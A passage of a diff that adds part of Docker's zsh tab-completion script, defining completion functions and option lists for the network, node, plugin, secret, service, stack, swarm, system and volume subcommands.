+                "($help -f --force)"{-f,--force}"[Do not prompt for confirmation]" && ret=0
+            ;;
+        (rm)
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help -)*:network:__docker_complete_networks" && ret=0
+            ;;
+        (help)
+            _arguments $(__docker_arguments) ":subcommand:__docker_network_commands" && ret=0
+            ;;
+    esac
+
+    return ret
+}
+
+# EO network
+
+# BO node
+
+__docker_node_complete_ls_filters() {
+    [[ $PREFIX = -* ]] && return 1
+    integer ret=1
+
+    if compset -P '*='; then
+        case "${${words[-1]%=*}#*=}" in
+            (id)
+                __docker_complete_nodes_ids && ret=0
+                ;;
+            (membership)
+                membership_opts=('accepted' 'pending' 'rejected')
+                _describe -t membership-opts "membership options" membership_opts && ret=0
+                ;;
+            (name)
+                __docker_complete_nodes_names && ret=0
+                ;;
+            (role)
+                role_opts=('manager' 'worker')
+                _describe -t role-opts "role options" role_opts && ret=0
+                ;;
+            *)
+                _message 'value' && ret=0
+                ;;
+        esac
+    else
+        opts=('id' 'label' 'membership' 'name' 'role')
+        _describe -t filter-opts "filter options" opts -qS "=" && ret=0
+    fi
+
+    return ret
+}
+
+__docker_node_complete_ps_filters() {
+    [[ $PREFIX = -* ]] && return 1
+    integer ret=1
+
+    if compset -P '*='; then
+        case "${${words[-1]%=*}#*=}" in
+            (desired-state)
+                state_opts=('accepted' 'running')
+                _describe -t state-opts "desired state options" state_opts && ret=0
+                ;;
+            *)
+                _message 'value' && ret=0
+                ;;
+        esac
+    else
+        opts=('desired-state' 'id' 'label' 'name')
+        _describe -t filter-opts "filter options" opts -qS "=" && ret=0
+    fi
+
+    return ret
+}
+
+__docker_nodes() {
+    [[ $PREFIX = -* ]] && return 1
+    integer ret=1
+    local line s
+    declare -a lines nodes args
+
+    type=$1; shift
+    filter=$1; shift
+    [[ $filter != "none" ]] && args=("-f $filter")
+
+    lines=(${(f)${:-"$(_call_program commands docker $docker_options node ls $args)"$'\n'}})
+    # Parse header line to find columns
+    local i=1 j=1 k header=${lines[1]}
+    declare -A begin end
+    while (( j < ${#header} - 1 )); do
+        i=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 1 ))
+        j=$(( i + ${${header[$i,-1]}[(i)  ]} - 1 ))
+        k=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 2 ))
+        begin[${header[$i,$((j-1))]}]=$i
+        end[${header[$i,$((j-1))]}]=$k
+    done
+    end[${header[$i,$((j-1))]}]=-1
+    lines=(${lines[2,-1]})
+
+    # Node ID
+    if [[ $type = (ids|all) ]]; then
+        for line in $lines; do
+            s="${line[${begin[ID]},${end[ID]}]%% ##}"
+            nodes=($nodes $s)
+        done
+    fi
+
+    # Names
+    if [[ $type = (names|all) ]]; then
+        for line in $lines; do
+            s="${line[${begin[NAME]},${end[NAME]}]%% ##}"
+            nodes=($nodes $s)
+        done
+    fi
+
+    _describe -t nodes-list "nodes" nodes "$@" && ret=0
+    return ret
+}
+
+__docker_complete_nodes() {
+    [[ $PREFIX = -* ]] && return 1
+    __docker_nodes all none "$@"
+}
+
+__docker_complete_nodes_ids() {
+    [[ $PREFIX = -* ]] && return 1
+    __docker_nodes ids none "$@"
+}
+
+__docker_complete_nodes_names() {
+    [[ $PREFIX = -* ]] && return 1
+    __docker_nodes names none "$@"
+}
+
+__docker_complete_pending_nodes() {
+    [[ $PREFIX = -* ]] && return 1
+    __docker_nodes all "membership=pending" "$@"
+}
+
+__docker_complete_manager_nodes() {
+    [[ $PREFIX = -* ]] && return 1
+    __docker_nodes all "role=manager" "$@"
+}
+
+__docker_complete_worker_nodes() {
+    [[ $PREFIX = -* ]] && return 1
+    __docker_nodes all "role=worker" "$@"
+}
+
+__docker_node_commands() {
+    local -a _docker_node_subcommands
+    _docker_node_subcommands=(
+        "demote:Demote a node as manager in the swarm"
+        "inspect:Display detailed information on one or more nodes"
+        "ls:List nodes in the swarm"
+        "promote:Promote a node as manager in the swarm"
+        "rm:Remove one or more nodes from the swarm"
+        "ps:List tasks running on one or more nodes, defaults to current node"
+        "update:Update a node"
+    )
+    _describe -t docker-node-commands "docker node command" _docker_node_subcommands
+}
+
+__docker_node_subcommand() {
+    local -a _command_args opts_help
+    local expl help="--help"
+    integer ret=1
+
+    opts_help=("(: -)--help[Print usage]")
+
+    case "$words[1]" in
+        (rm|remove)
+             _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help -f --force)"{-f,--force}"[Force remove a node from the swarm]" \
+                "($help -)*:node:__docker_complete_pending_nodes" && ret=0
+            ;;
+        (demote)
+             _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help -)*:node:__docker_complete_manager_nodes" && ret=0
+            ;;
+        (inspect)
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help -f --format)"{-f=,--format=}"[Format the output using the given go template]:template: " \
+                "($help)--pretty[Print the information in a human friendly format]" \
+                "($help -)*:node:__docker_complete_nodes" && ret=0
+            ;;
+        (ls|list)
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help)*"{-f=,--filter=}"[Provide filter values]:filter:->filter-options" \
+                "($help -q --quiet)"{-q,--quiet}"[Only display IDs]" && ret=0
+            case $state in
+                (filter-options)
+                    __docker_node_complete_ls_filters && ret=0
+                    ;;
+            esac
+            ;;
+        (promote)
+             _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help -)*:node:__docker_complete_worker_nodes" && ret=0
+            ;;
+        (ps)
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help -a --all)"{-a,--all}"[Display all instances]" \
+                "($help)*"{-f=,--filter=}"[Provide filter values]:filter:->filter-options" \
+                "($help)--no-resolve[Do not map IDs to Names]" \
+                "($help)--no-trunc[Do not truncate output]" \
+                "($help -)*:node:__docker_complete_nodes" && ret=0
+            case $state in
+                (filter-options)
+                    __docker_node_complete_ps_filters && ret=0
+                    ;;
+            esac
+            ;;
+        (update)
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help)--availability=[Availability of the node]:availability:(active pause drain)" \
+                "($help)*--label-add=[Add or update a node label]:key=value: " \
+                "($help)*--label-rm=[Remove a node label if exists]:label: " \
+                "($help)--role=[Role of the node]:role:(manager worker)" \
+                "($help -)1:node:__docker_complete_nodes" && ret=0
+            ;;
+        (help)
+            _arguments $(__docker_arguments) ":subcommand:__docker_node_commands" && ret=0
+            ;;
+    esac
+
+    return ret
+}
+
+# EO node
+
+# BO plugin
+
+__docker_complete_plugins() {
+    [[ $PREFIX = -* ]] && return 1
+    integer ret=1
+    local line s
+    declare -a lines plugins
+
+    lines=(${(f)${:-"$(_call_program commands docker $docker_options plugin ls)"$'\n'}})
+
+    # Parse header line to find columns
+    local i=1 j=1 k header=${lines[1]}
+    declare -A begin end
+    while (( j < ${#header} - 1 )); do
+        i=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 1 ))
+        j=$(( i + ${${header[$i,-1]}[(i)  ]} - 1 ))
+        k=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 2 ))
+        begin[${header[$i,$((j-1))]}]=$i
+        end[${header[$i,$((j-1))]}]=$k
+    done
+    end[${header[$i,$((j-1))]}]=-1
+    lines=(${lines[2,-1]})
+
+    # Name
+    for line in $lines; do
+        s="${line[${begin[NAME]},${end[NAME]}]%% ##}"
+        s="$s:${(l:7:: :::)${${line[${begin[TAG]},${end[TAG]}]}%% ##}}"
+        plugins=($plugins $s)
+    done
+
+    _describe -t plugins-list "plugins" plugins "$@" && ret=0
+    return ret
+}
+
+__docker_plugin_commands() {
+    local -a _docker_plugin_subcommands
+    _docker_plugin_subcommands=(
+        "disable:Disable a plugin"
+        "enable:Enable a plugin"
+        "inspect:Return low-level information about a plugin"
+        "install:Install a plugin"
+        "ls:List plugins"
+        "push:Push a plugin"
+        "rm:Remove a plugin"
+        "set:Change settings for a plugin"
+    )
+    _describe -t docker-plugin-commands "docker plugin command" _docker_plugin_subcommands
+}
+
+__docker_plugin_subcommand() {
+    local -a _command_args opts_help
+    local expl help="--help"
+    integer ret=1
+
+    opts_help=("(: -)--help[Print usage]")
+
+    case "$words[1]" in
+        (disable|enable|inspect|ls|push|rm)
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help -)1:plugin:__docker_complete_plugins" && ret=0
+            ;;
+        (install)
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help)--alias=[Local name for plugin]:alias: " \
+                "($help -)1:plugin:__docker_complete_plugins" && ret=0
+            ;;
+        (set)
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help -)1:plugin:__docker_complete_plugins" \
+                "($help-)*:key=value: " && ret=0
+            ;;
+        (help)
+            _arguments $(__docker_arguments) ":subcommand:__docker_plugin_commands" && ret=0
+            ;;
+    esac
+
+    return ret
+}
+
+# EO plugin
+
+# BO secret
+
+__docker_secrets() {
+    [[ $PREFIX = -* ]] && return 1
+    integer ret=1
+    local line s
+    declare -a lines secrets
+
+    type=$1; shift
+
+    lines=(${(f)${:-"$(_call_program commands docker $docker_options secret ls)"$'\n'}})
+
+    # Parse header line to find columns
+    local i=1 j=1 k header=${lines[1]}
+    declare -A begin end
+    while (( j < ${#header} - 1 )); do
+        i=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 1 ))
+        j=$(( i + ${${header[$i,-1]}[(i)  ]} - 1 ))
+        k=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 2 ))
+        begin[${header[$i,$((j-1))]}]=$i
+        end[${header[$i,$((j-1))]}]=$k
+    done
+    end[${header[$i,$((j-1))]}]=-1
+    lines=(${lines[2,-1]})
+
+    # ID
+    if [[ $type = (ids|all) ]]; then
+        for line in $lines; do
+            s="${line[${begin[ID]},${end[ID]}]%% ##}"
+            secrets=($secrets $s)
+        done
+    fi
+
+    # Names
+    if [[ $type = (names|all) ]]; then
+        for line in $lines; do
+            s="${line[${begin[NAME]},${end[NAME]}]%% ##}"
+            secrets=($secrets $s)
+        done
+    fi
+
+    _describe -t secrets-list "secrets" secrets "$@" && ret=0
+    return ret
+}
+
+__docker_complete_secrets() {
+    [[ $PREFIX = -* ]] && return 1
+    __docker_secrets all "$@"
+}
+
+__docker_secret_commands() {
+    local -a _docker_secret_subcommands
+    _docker_secret_subcommands=(
+        "create:Create a secret using stdin as content"
+        "inspect:Display detailed information on one or more secrets"
+        "ls:List secrets"
+        "rm:Remove one or more secrets"
+    )
+    _describe -t docker-secret-commands "docker secret command" _docker_secret_subcommands
+}
+
+__docker_secret_subcommand() {
+    local -a _command_args opts_help
+    local expl help="--help"
+    integer ret=1
+
+    opts_help=("(: -)--help[Print usage]")
+
+    case "$words[1]" in
+        (create)
+            _arguments $(__docker_arguments) -A '-*' \
+                $opts_help \
+                "($help)*"{-l=,--label=}"[Secret labels]:label: " \
+                "($help -):secret: " && ret=0
+            ;;
+        (inspect)
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help -f --format)"{-f=,--format=}"[Format the output using the given Go template]:template: " \
+                "($help -)*:secret:__docker_complete_secrets" && ret=0
+            ;;
+        (ls|list)
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help -q --quiet)"{-q,--quiet}"[Only display IDs]" && ret=0
+            ;;
+        (rm|remove)
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help -)*:secret:__docker_complete_secrets" && ret=0
+            ;;
+        (help)
+            _arguments $(__docker_arguments) ":subcommand:__docker_secret_commands" && ret=0
+            ;;
+    esac
+
+    return ret
+}
+
+# EO secret
+
+# BO service
+
+__docker_service_complete_ls_filters() {
+    [[ $PREFIX = -* ]] && return 1
+    integer ret=1
+
+    if compset -P '*='; then
+        case "${${words[-1]%=*}#*=}" in
+            (id)
+                __docker_complete_services_ids && ret=0
+                ;;
+            (name)
+                __docker_complete_services_names && ret=0
+                ;;
+            *)
+                _message 'value' && ret=0
+                ;;
+        esac
+    else
+        opts=('id' 'label' 'name')
+        _describe -t filter-opts "filter options" opts -qS "=" && ret=0
+    fi
+
+    return ret
+}
+
+__docker_service_complete_ps_filters() {
+    [[ $PREFIX = -* ]] && return 1
+    integer ret=1
+
+    if compset -P '*='; then
+        case "${${words[-1]%=*}#*=}" in
+            (desired-state)
+                state_opts=('accepted' 'running')
+                _describe -t state-opts "desired state options" state_opts && ret=0
+                ;;
+            *)
+                _message 'value' && ret=0
+                ;;
+        esac
+    else
+        opts=('desired-state' 'id' 'label' 'name')
+        _describe -t filter-opts "filter options" opts -qS "=" && ret=0
+    fi
+
+    return ret
+}
+
+__docker_services() {
+    [[ $PREFIX = -* ]] && return 1
+    integer ret=1
+    local line s
+    declare -a lines services
+
+    type=$1; shift
+
+    lines=(${(f)${:-"$(_call_program commands docker $docker_options service ls)"$'\n'}})
+
+    # Parse header line to find columns
+    local i=1 j=1 k header=${lines[1]}
+    declare -A begin end
+    while (( j < ${#header} - 1 )); do
+        i=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 1 ))
+        j=$(( i + ${${header[$i,-1]}[(i)  ]} - 1 ))
+        k=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 2 ))
+        begin[${header[$i,$((j-1))]}]=$i
+        end[${header[$i,$((j-1))]}]=$k
+    done
+    end[${header[$i,$((j-1))]}]=-1
+    lines=(${lines[2,-1]})
+
+    # Service ID
+    if [[ $type = (ids|all) ]]; then
+        for line in $lines; do
+            s="${line[${begin[ID]},${end[ID]}]%% ##}"
+            s="$s:${(l:7:: :::)${${line[${begin[IMAGE]},${end[IMAGE]}]}%% ##}}"
+            services=($services $s)
+        done
+    fi
+
+    # Names
+    if [[ $type = (names|all) ]]; then
+        for line in $lines; do
+            s="${line[${begin[NAME]},${end[NAME]}]%% ##}"
+            s="$s:${(l:7:: :::)${${line[${begin[IMAGE]},${end[IMAGE]}]}%% ##}}"
+            services=($services $s)
+        done
+    fi
+
+    _describe -t services-list "services" services "$@" && ret=0
+    return ret
+}
+
+__docker_complete_services() {
+    [[ $PREFIX = -* ]] && return 1
+    __docker_services all "$@"
+}
+
+__docker_complete_services_ids() {
+    [[ $PREFIX = -* ]] && return 1
+    __docker_services ids "$@"
+}
+
+__docker_complete_services_names() {
+    [[ $PREFIX = -* ]] && return 1
+    __docker_services names "$@"
+}
+
+__docker_service_commands() {
+    local -a _docker_service_subcommands
+    _docker_service_subcommands=(
+        "create:Create a new service"
+        "inspect:Display detailed information on one or more services"
+        "ls:List services"
+        "rm:Remove one or more services"
+        "scale:Scale one or multiple replicated services"
+        "ps:List the tasks of a service"
+        "update:Update a service"
+    )
+    _describe -t docker-service-commands "docker service command" _docker_service_subcommands
+}
+
+__docker_service_subcommand() {
+    local -a _command_args opts_help opts_create_update
+    local expl help="--help"
+    integer ret=1
+
+    opts_help=("(: -)--help[Print usage]")
+    opts_create_update=(
+        "($help)*--constraint=[Placement constraints]:constraint: "
+        "($help)--endpoint-mode=[Placement constraints]:mode:(dnsrr vip)"
+        "($help)*"{-e=,--env=}"[Set environment variables]:env: "
+        "($help)--health-cmd=[Command to run to check health]:command: "
+        "($help)--health-interval=[Time between running the check]:time: "
+        "($help)--health-retries=[Consecutive failures needed to report unhealthy]:retries:(1 2 3 4 5)"
+        "($help)--health-timeout=[Maximum time to allow one check to run]:time: "
+        "($help)--hostname=[Service container hostname]:hostname: " \
+        "($help)*--label=[Service labels]:label: "
+        "($help)--limit-cpu=[Limit CPUs]:value: "
+        "($help)--limit-memory=[Limit Memory]:value: "
+        "($help)--log-driver=[Logging driver for service]:logging driver:__docker_complete_log_drivers"
+        "($help)*--log-opt=[Logging driver options]:log driver options:__docker_complete_log_options"
+        "($help)*--mount=[Attach a filesystem mount to the service]:mount: "
+        "($help)*--network=[Network attachments]:network: "
+        "($help)--no-healthcheck[Disable any container-specified HEALTHCHECK]"
+        "($help)*"{-p=,--publish=}"[Publish a port as a node port]:port: "
+        "($help)--replicas=[Number of tasks]:replicas: "
+        "($help)--reserve-cpu=[Reserve CPUs]:value: "
+        "($help)--reserve-memory=[Reserve Memory]:value: "
+        "($help)--restart-condition=[Restart when condition is met]:mode:(any none on-failure)"
+        "($help)--restart-delay=[Delay between restart attempts]:delay: "
+        "($help)--restart-max-attempts=[Maximum number of restarts before giving up]:max-attempts: "
+        "($help)--restart-window=[Window used to evaluate the restart policy]:window: "
+        "($help)*--secret=[Specify secrets to expose to the service]:secret:__docker_complete_secrets"
+        "($help)--stop-grace-period=[Time to wait before force killing a container]:grace period: "
+        "($help -t --tty)"{-t,--tty}"[Allocate a pseudo-TTY]"
+        "($help)--update-delay=[Delay between updates]:delay: "
+        "($help)--update-failure-action=[Action on update failure]:mode:(pause continue)"
+        "($help)--update-max-failure-ratio=[Failure rate to tolerate during an update]:fraction: "
+        "($help)--update-monitor=[Duration after each task update to monitor for failure]:window: "
+        "($help)--update-parallelism=[Maximum number of tasks updated simultaneously]:number: "
+        "($help -u --user)"{-u=,--user=}"[Username or UID]:user:_users"
+        "($help)--with-registry-auth[Send registry authentication details to swarm agents]"
+        "($help -w --workdir)"{-w=,--workdir=}"[Working directory inside the container]:directory:_directories"
+    )
+
+    case "$words[1]" in
+        (create)
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                $opts_create_update \
+                "($help)*--container-label=[Container labels]:label: " \
+                "($help)*--dns=[Set custom DNS servers]:DNS: " \
+                "($help)*--dns-option=[Set DNS options]:DNS option: " \
+                "($help)*--dns-search=[Set custom DNS search domains]:DNS search: " \
+                "($help)*--env-file=[Read environment variables from a file]:environment file:_files" \
+                "($help)--mode=[Service Mode]:mode:(global replicated)" \
+                "($help)--name=[Service name]:name: " \
+                "($help)*--publish=[Publish a port]:port: " \
+                "($help -): :__docker_complete_images" \
+                "($help -):command: _command_names -e" \
+                "($help -)*::arguments: _normal" && ret=0
+            ;;
+        (inspect)
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help -f --format)"{-f=,--format=}"[Format the output using the given go template]:template: " \
+                "($help)--pretty[Print the information in a human friendly format]" \
+                "($help -)*:service:__docker_complete_services" && ret=0
+            ;;
+        (ls|list)
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help)*"{-f=,--filter=}"[Filter output based on conditions provided]:filter:->filter-options" \
+                "($help -q --quiet)"{-q,--quiet}"[Only display IDs]" && ret=0
+            case $state in
+                (filter-options)
+                    __docker_service_complete_ls_filters && ret=0
+                    ;;
+            esac
+            ;;
+        (rm|remove)
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help -)*:service:__docker_complete_services" && ret=0
+            ;;
+        (scale)
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help -)*:service:->values" && ret=0
+            case $state in
+                (values)
+                    if compset -P '*='; then
+                        _message 'replicas' && ret=0
+                    else
+                        __docker_complete_services -qS "="
+                    fi
+                    ;;
+            esac
+            ;;
+        (ps)
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help)*"{-f=,--filter=}"[Provide filter values]:filter:->filter-options" \
+                "($help)--no-resolve[Do not map IDs to Names]" \
+                "($help)--no-trunc[Do not truncate output]" \
+                "($help -q --quiet)"{-q,--quiet}"[Only display task IDs]" \
+                "($help -)1:service:__docker_complete_services" && ret=0
+            case $state in
+                (filter-options)
+                    __docker_service_complete_ps_filters && ret=0
+                    ;;
+            esac
+            ;;
+        (update)
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                $opts_create_update \
+                "($help)--arg=[Service command args]:arguments: _normal" \
+                "($help)*--container-label-add=[Add or update container labels]:label: " \
+                "($help)*--container-label-rm=[Remove a container label by its key]:label: " \
+                "($help)*--dns-add=[Add or update custom DNS servers]:DNS: " \
+                "($help)*--dns-rm=[Remove custom DNS servers]:DNS: " \
+                "($help)*--dns-option-add=[Add or update DNS options]:DNS option: " \
+                "($help)*--dns-option-rm=[Remove DNS options]:DNS option: " \
+                "($help)*--dns-search-add=[Add or update custom DNS search domains]:DNS search: " \
+                "($help)*--dns-search-rm=[Remove DNS search domains]:DNS search: " \
+                "($help)--force[Force update]" \
+                "($help)*--group-add=[Add additional supplementary user groups to the container]:group:_groups" \
+                "($help)*--group-rm=[Remove previously added supplementary user groups from the container]:group:_groups" \
+                "($help)--image=[Service image tag]:image:__docker_complete_repositories" \
+                "($help)*--publish-add=[Add or update a port]:port: " \
+                "($help)*--publish-rm=[Remove a port(target-port mandatory)]:port: " \
+                "($help)--rollback[Rollback to previous specification]" \
+                "($help -)1:service:__docker_complete_services" && ret=0
+            ;;
+        (help)
+            _arguments $(__docker_arguments) ":subcommand:__docker_service_commands" && ret=0
+            ;;
+    esac
+
+    return ret
+}
+
+# EO service
+
+# BO stack
+
+__docker_stack_complete_ps_filters() {
+    [[ $PREFIX = -* ]] && return 1
+    integer ret=1
+
+    if compset -P '*='; then
+        case "${${words[-1]%=*}#*=}" in
+            (desired-state)
+                state_opts=('accepted' 'running')
+                _describe -t state-opts "desired state options" state_opts && ret=0
+                ;;
+            *)
+                _message 'value' && ret=0
+                ;;
+        esac
+    else
+        opts=('desired-state' 'id' 'name')
+        _describe -t filter-opts "filter options" opts -qS "=" && ret=0
+    fi
+
+    return ret
+}
+
+__docker_stack_complete_services_filters() {
+    [[ $PREFIX = -* ]] && return 1
+    integer ret=1
+
+    if compset -P '*='; then
+        case "${${words[-1]%=*}#*=}" in
+            *)
+                _message 'value' && ret=0
+                ;;
+        esac
+    else
+        opts=('id' 'label' 'name')
+        _describe -t filter-opts "filter options" opts -qS "=" && ret=0
+    fi
+
+    return ret
+}
+
+__docker_stacks() {
+    [[ $PREFIX = -* ]] && return 1
+    integer ret=1
+    local line s
+    declare -a lines stacks
+
+    lines=(${(f)${:-"$(_call_program commands docker $docker_options stack ls)"$'\n'}})
+
+    # Parse header line to find columns
+    local i=1 j=1 k header=${lines[1]}
+    declare -A begin end
+    while (( j < ${#header} - 1 )); do
+        i=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 1 ))
+        j=$(( i + ${${header[$i,-1]}[(i)  ]} - 1 ))
+        k=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 2 ))
+        begin[${header[$i,$((j-1))]}]=$i
+        end[${header[$i,$((j-1))]}]=$k
+    done
+    end[${header[$i,$((j-1))]}]=-1
+    lines=(${lines[2,-1]})
+
+    # Service ID
+    for line in $lines; do
+        s="${line[${begin[ID]},${end[ID]}]%% ##}"
+        stacks=($stacks $s)
+    done
+
+    _describe -t stacks-list "stacks" stacks "$@" && ret=0
+    return ret
+}
+
+__docker_complete_stacks() {
+    [[ $PREFIX = -* ]] && return 1
+    __docker_stacks "$@"
+}
+
+__docker_stack_commands() {
+    local -a _docker_stack_subcommands
+    _docker_stack_subcommands=(
+        "deploy:Deploy a new stack or update an existing stack"
+        "ls:List stacks"
+        "ps:List the tasks in the stack"
+        "rm:Remove the stack"
+        "services:List the services in the stack"
+    )
+    _describe -t docker-stack-commands "docker stack command" _docker_stack_subcommands
+}
+
+__docker_stack_subcommand() {
+    local -a _command_args opts_help
+    local expl help="--help"
+    integer ret=1
+
+    opts_help=("(: -)--help[Print usage]")
+
+    case "$words[1]" in
+        (deploy|up)
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help)--bundle-file=[Path to a Distributed Application Bundle file]:dab:_files -g \"*.dab\"" \
+                "($help -c --compose-file)"{-c=,--compose-file=}"[Path to a Compose file]:compose file:_files -g \"*.(yml|yaml)\"" \
+                "($help)--with-registry-auth[Send registry authentication details to Swarm agents]" \
+                "($help -):stack:__docker_complete_stacks" && ret=0
+            ;;
+        (ls|list)
+            _arguments $(__docker_arguments) \
+                $opts_help && ret=0
+            ;;
+        (ps)
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help -a --all)"{-a,--all}"[Display all tasks]" \
+                "($help)*"{-f=,--filter=}"[Filter output based on conditions provided]:filter:__docker_stack_complete_ps_filters" \
+                "($help)--no-resolve[Do not map IDs to Names]" \
+                "($help)--no-trunc[Do not truncate output]" \
+                "($help -):stack:__docker_complete_stacks" && ret=0
+            ;;
+        (rm|remove|down)
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help -):stack:__docker_complete_stacks" && ret=0
+            ;;
+        (services)
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help)*"{-f=,--filter=}"[Filter output based on conditions provided]:filter:__docker_stack_complete_services_filters" \
+                "($help -q --quiet)"{-q,--quiet}"[Only display IDs]" \
+                "($help -):stack:__docker_complete_stacks" && ret=0
+            ;;
+        (help)
+            _arguments $(__docker_arguments) ":subcommand:__docker_stack_commands" && ret=0
+            ;;
+    esac
+
+    return ret
+}
+
+# EO stack
+
+# BO swarm
+
+__docker_swarm_commands() {
+    local -a _docker_swarm_subcommands
+    _docker_swarm_subcommands=(
+        "init:Initialize a swarm"
+        "join:Join a swarm as a node and/or manager"
+        "join-token:Manage join tokens"
+        "leave:Leave a swarm"
+        "update:Update the swarm"
+    )
+    _describe -t docker-swarm-commands "docker swarm command" _docker_swarm_subcommands
+}
+
+__docker_swarm_subcommand() {
+    local -a _command_args opts_help
+    local expl help="--help"
+    integer ret=1
+
+    opts_help=("(: -)--help[Print usage]")
+
+    case "$words[1]" in
+        (init)
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help)--advertise-addr[Advertised address]:ip\:port: " \
+                "($help)*--external-ca=[Specifications of one or more certificate signing endpoints]:endpoint: " \
+                "($help)--force-new-cluster[Force create a new cluster from current state]" \
+                "($help)--listen-addr=[Listen address]:ip\:port: " \
+                "($help)--max-snapshots[Number of additional Raft snapshots to retain]" \
+                "($help)--snapshot-interval[Number of log entries between Raft snapshots]" \
+                "($help)--task-history-limit=[Task history retention limit]:limit: " && ret=0
+            ;;
+        (join)
+            _arguments $(__docker_arguments) -A '-*' \
+                $opts_help \
+                "($help)--advertise-addr=[Advertised address]:ip\:port: " \
+                "($help)--availability=[Availability of the node]:availability:(active drain pause)" \
+                "($help)--listen-addr=[Listen address]:ip\:port: " \
+                "($help)--token=[Token for entry into the swarm]:secret: " \
+                "($help -):host\:port: " && ret=0
+            ;;
+        (join-token)
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help -q --quiet)"{-q,--quiet}"[Only display token]" \
+                "($help)--rotate[Rotate join token]" \
+                "($help -):role:(manager worker)" && ret=0
+            ;;
+        (leave)
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help -f --force)"{-f,--force}"[Force this node to leave the swarm, ignoring warnings]" && ret=0
+            ;;
+        (update)
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help)--cert-expiry=[Validity period for node certificates]:duration: " \
+                "($help)*--external-ca=[Specifications of one or more certificate signing endpoints]:endpoint: " \
+                "($help)--dispatcher-heartbeat=[Dispatcher heartbeat period]:duration: " \
+                "($help)--max-snapshots[Number of additional Raft snapshots to retain]" \
+                "($help)--snapshot-interval[Number of log entries between Raft snapshots]" \
+                "($help)--task-history-limit=[Task history retention limit]:limit: " && ret=0
+            ;;
+        (help)
+            _arguments $(__docker_arguments) ":subcommand:__docker_network_commands" && ret=0
+            ;;
+    esac
+
+    return ret
+}
+
+# EO swarm
+
+# BO system
+
+__docker_system_commands() {
+    local -a _docker_system_subcommands
+    _docker_system_subcommands=(
+        "df:Show docker filesystem usage"
+        "events:Get real time events from the server"
+        "info:Display system-wide information"
+        "prune:Remove unused data"
+    )
+    _describe -t docker-system-commands "docker system command" _docker_system_subcommands
+}
+
+__docker_system_subcommand() {
+    local -a _command_args opts_help
+    local expl help="--help"
+    integer ret=1
+
+    opts_help=("(: -)--help[Print usage]")
+
+    case "$words[1]" in
+        (df)
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help -v --verbose)"{-v,--verbose}"[Show detailed information on space usage]" && ret=0
+            ;;
+        (events)
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help)*"{-f=,--filter=}"[Filter values]:filter:__docker_complete_events_filter" \
+                "($help)--since=[Events created since this timestamp]:timestamp: " \
+                "($help)--until=[Events created until this timestamp]:timestamp: " \
+                "($help)--format=[Format the output using the given go template]:template: " && ret=0
+            ;;
+        (info)
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help -f --format)"{-f=,--format=}"[Format the output using the given go template]:template: " && ret=0
+            ;;
+        (prune)
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help -a --all)"{-a,--all}"[Remove all unused data, not just dangling ones]" \
+                "($help)*--filter=[Filter values]:filter:__docker_complete_prune_filters" \
+                "($help -f --force)"{-f,--force}"[Do not prompt for confirmation]" && ret=0
+            ;;
+        (help)
+            _arguments $(__docker_arguments) ":subcommand:__docker_volume_commands" && ret=0
+            ;;
+    esac
+
+    return ret
+}
+
+# EO system
+
+# BO volume
+
+__docker_volume_complete_ls_filters() {
+    [[ $PREFIX = -* ]] && return 1
+    integer ret=1
+
+    if compset -P '*='; then
+        case "${${words[-1]%=*}#*=}" in
+            (dangling)
+                dangling_opts=('true' 'false')
+                _describe -t dangling-filter-opts "Dangling Filter Options" dangling_opts && ret=0
+                ;;
+            (driver)
+                __docker_complete_info_plugins Volume && ret=0
+                ;;
+            (name)
+                __docker_complete_volumes && ret=0
+                ;;
+            *)
+                _message 'value' && ret=0
+                ;;
+        esac
+    else
+        opts=('dangling' 'driver' 'label' 'name')
+        _describe -t filter-opts "Filter Options" opts -qS "=" && ret=0
+    fi
+
+    return ret
+}
+
+__docker_complete_volumes() {
+    [[ $PREFIX = -* ]] && return 1
+    integer ret=1
+    declare -a lines volumes
+
+    lines=(${(f)${:-"$(_call_program commands docker $docker_options volume ls)"$'\n'}})
+
+    # Parse header line to find columns
+    local i=1 j=1 k header=${lines[1]}
+    declare -A begin end
+    while (( j < ${#header} - 1 )); do
+        i=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 1 ))
